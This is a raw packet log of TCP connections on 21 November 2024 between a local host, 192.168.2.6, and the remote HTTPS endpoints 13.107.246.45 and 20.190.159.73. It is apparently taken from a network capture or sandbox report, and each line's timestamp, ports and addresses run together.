                                                                                                                                                                      Nov 21, 2024 06:24:39.554999113 CET4434996913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:39.555104017 CET49969443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:39.555238962 CET49969443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:39.555258036 CET4434996913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:39.719790936 CET4434996513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:39.722774029 CET4434996513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:39.722847939 CET49965443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:39.723021984 CET49965443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:39.723037004 CET4434996513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:39.727816105 CET49970443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:39.727916956 CET4434997013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:39.728007078 CET49970443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:39.728255033 CET49970443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:39.728288889 CET4434997013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:40.954988956 CET4434996613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:40.955481052 CET49966443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:40.955507040 CET4434996613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:40.955935955 CET49966443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:40.955940962 CET4434996613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:41.137109041 CET4434996713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:41.138442039 CET49967443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:41.138468027 CET4434996713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:41.139161110 CET49967443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:41.139166117 CET4434996713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:41.334253073 CET4434996913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:41.334850073 CET49969443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:41.334914923 CET4434996913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:41.335293055 CET49969443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:41.335306883 CET4434996913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:41.391347885 CET4434996613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:41.391990900 CET4434996813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:41.392579079 CET49968443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:41.392606020 CET4434996813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:41.393052101 CET49968443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:41.393060923 CET4434996813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:41.394409895 CET4434996613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:41.394474030 CET4434996613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:41.394479036 CET49966443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:41.394540071 CET49966443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:41.394625902 CET49966443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:41.394644022 CET4434996613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:41.394659042 CET49966443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:41.394664049 CET4434996613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:41.397495985 CET49971443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:41.397535086 CET4434997113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:41.397907019 CET49971443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:41.397907972 CET49971443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:41.397945881 CET4434997113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:41.516366005 CET4434997013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:41.517044067 CET49970443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:41.517085075 CET4434997013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:41.517535925 CET49970443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:41.517541885 CET4434997013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:41.587379932 CET4434996713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:41.590455055 CET4434996713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:41.590524912 CET49967443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:41.590787888 CET49967443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:41.590809107 CET4434996713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:41.590821028 CET49967443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:41.590826035 CET4434996713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:41.594894886 CET49972443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:41.594921112 CET4434997213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:41.595006943 CET49972443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:41.595295906 CET49972443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:41.595309973 CET4434997213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:41.780926943 CET4434996913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:41.784013987 CET4434996913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:41.784092903 CET49969443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:41.784209013 CET49969443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:41.784209013 CET49969443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:41.784255981 CET4434996913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:41.784282923 CET4434996913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:41.787421942 CET49973443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:41.787507057 CET4434997313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:41.787604094 CET49973443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:41.787775993 CET49973443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:41.787810087 CET4434997313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:41.844871044 CET4434996813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:41.848011971 CET4434996813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:41.848089933 CET4434996813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:41.848102093 CET49968443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:41.848269939 CET49968443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:41.848270893 CET49968443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:41.848270893 CET49968443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:41.850826025 CET49974443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:41.850866079 CET4434997413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:41.850948095 CET49974443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:41.876110077 CET49974443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:41.876123905 CET4434997413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:41.959909916 CET4434997013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:41.963140011 CET4434997013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:41.963346958 CET4434997013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:41.963424921 CET49970443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:41.965912104 CET49970443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:41.977124929 CET49970443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:41.977124929 CET49970443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:41.977159977 CET4434997013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:41.977174044 CET4434997013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:41.996309996 CET49975443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:41.996356964 CET4434997513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:41.996439934 CET49975443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:41.996679068 CET49975443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:41.996690989 CET4434997513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:42.135709047 CET49968443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:42.135781050 CET4434996813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:43.176940918 CET4434997113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:43.177634954 CET49971443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:43.177669048 CET4434997113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:43.177973032 CET49971443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:43.177978992 CET4434997113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:43.442243099 CET4434997213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:43.443054914 CET49972443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:43.443074942 CET4434997213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:43.443413973 CET49972443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:43.443419933 CET4434997213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:43.506231070 CET4434997313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:43.510365963 CET49973443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:43.510390997 CET4434997313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:43.510862112 CET49973443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:43.510865927 CET4434997313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:43.621949911 CET4434997113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:43.625145912 CET4434997113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:43.625204086 CET49971443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:43.625266075 CET49971443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:43.625293970 CET4434997113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:43.625313044 CET49971443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:43.625322104 CET4434997113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:43.628441095 CET49976443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:43.628479004 CET4434997613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:43.628552914 CET49976443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:43.628695011 CET49976443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:43.628706932 CET4434997613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:43.721348047 CET4434997413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:43.721962929 CET49974443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:43.721980095 CET4434997413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:43.722503901 CET49974443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:43.722508907 CET4434997413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:43.846864939 CET4434997513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:43.847584009 CET49975443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:43.847604990 CET4434997513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:43.848023891 CET49975443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:43.848028898 CET4434997513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:43.894517899 CET4434997213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:43.894551039 CET4434997213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:43.895030022 CET49972443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:43.895044088 CET4434997213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:43.895332098 CET49972443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:43.895342112 CET4434997213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:43.895518064 CET4434997213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:43.895554066 CET4434997213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:43.895586967 CET49972443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:43.895593882 CET4434997213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:43.895647049 CET49972443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:43.898212910 CET49977443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:43.898251057 CET4434997713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:43.898353100 CET49977443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:43.898479939 CET49977443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:43.898495913 CET4434997713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:43.942188025 CET4434997313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:43.942223072 CET4434997313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:43.942276001 CET49973443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:43.942302942 CET4434997313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:43.942482948 CET49973443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:43.942492962 CET4434997313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:43.942504883 CET49973443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:43.942666054 CET4434997313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:43.942697048 CET4434997313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:43.945831060 CET49978443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:43.945863962 CET49973443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:43.945885897 CET4434997813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:43.949969053 CET49978443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:43.950161934 CET49978443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:43.950170994 CET4434997813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:44.173870087 CET4434997413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:44.176928043 CET4434997413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:44.176989079 CET4434997413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:44.177050114 CET49974443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:44.177050114 CET49974443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:44.177263021 CET49974443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:44.177273035 CET4434997413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:44.177289963 CET49974443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:44.177294970 CET4434997413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:44.180068970 CET49979443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:44.180110931 CET4434997913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:44.180208921 CET49979443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:44.180349112 CET49979443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:44.180360079 CET4434997913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:44.298778057 CET4434997513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:44.302463055 CET4434997513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:44.302536011 CET49975443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:44.302584887 CET49975443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:44.302609921 CET4434997513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:44.306369066 CET49980443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:44.306422949 CET4434998013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:44.306489944 CET49980443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:44.307512999 CET49980443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:44.307534933 CET4434998013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:45.344646931 CET4434997613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:45.345216036 CET49976443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:45.345248938 CET4434997613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:45.345681906 CET49976443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:45.345690012 CET4434997613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:45.678729057 CET4434997713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:45.679331064 CET49977443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:45.679372072 CET4434997713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:45.679918051 CET49977443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:45.679923058 CET4434997713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:45.730845928 CET4434997813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:45.731468916 CET49978443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:45.731496096 CET4434997813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:45.731945992 CET49978443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:45.731955051 CET4434997813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:45.776988029 CET4434997613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:45.780533075 CET4434997613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:45.780652046 CET4434997613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:45.780693054 CET49976443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:45.780725956 CET49976443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:45.780757904 CET49976443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:45.780781031 CET4434997613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:45.780797958 CET49976443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:45.780802965 CET4434997613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:45.783608913 CET49981443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:45.783651114 CET4434998113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:45.783751011 CET49981443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:45.783921003 CET49981443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:45.783932924 CET4434998113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:45.905944109 CET4434997913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:45.906689882 CET49979443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:45.906735897 CET4434997913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:45.907051086 CET49979443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:45.907056093 CET4434997913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:46.094319105 CET4434998013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:46.094840050 CET49980443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:46.094881058 CET4434998013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:46.095427036 CET49980443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:46.095436096 CET4434998013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:46.123084068 CET4434997713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:46.126437902 CET4434997713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:46.126565933 CET49977443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:46.129625082 CET49977443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:46.129621983 CET49982443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:46.129625082 CET49977443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:46.129652977 CET4434997713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:46.129662991 CET4434997713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:46.129683018 CET4434998213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:46.129776955 CET49982443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:46.129940987 CET49982443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:46.129957914 CET4434998213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:46.178564072 CET4434997813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:46.181716919 CET4434997813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:46.181770086 CET4434997813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:46.181826115 CET49978443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:46.181998968 CET49978443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:46.181998968 CET49978443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:46.181998968 CET49978443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:46.184580088 CET49983443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:46.184613943 CET4434998313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:46.184688091 CET49983443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:46.184829950 CET49983443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:46.184842110 CET4434998313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:46.289915085 CET49703443192.168.2.620.190.159.73
                                                                                                                                                                      Nov 21, 2024 06:24:46.343714952 CET4434997913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:46.346757889 CET4434997913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:46.346843958 CET49979443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:46.346885920 CET49979443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:46.346904993 CET4434997913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:46.346914053 CET49979443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:46.346919060 CET4434997913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:46.350189924 CET49984443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:46.350227118 CET4434998413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:46.350317955 CET49984443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:46.350497961 CET49984443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:46.350507975 CET4434998413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:46.409821987 CET4434970320.190.159.73192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:46.409918070 CET49703443192.168.2.620.190.159.73
                                                                                                                                                                      Nov 21, 2024 06:24:46.492178917 CET49978443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:46.492222071 CET4434997813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:46.541466951 CET4434998013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:46.544584036 CET4434998013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:46.544629097 CET4434998013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:46.544635057 CET49980443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:46.544682980 CET49980443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:46.544722080 CET49980443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:46.544743061 CET4434998013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:46.544758081 CET49980443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:46.544765949 CET4434998013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:46.547527075 CET49985443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:46.547552109 CET4434998513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:46.547621965 CET49985443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:46.547759056 CET49985443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:46.547775030 CET4434998513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:47.565613985 CET4434998113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:47.566165924 CET49981443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:47.566184044 CET4434998113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:47.566711903 CET49981443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:47.566721916 CET4434998113.107.246.45192.168.2.6
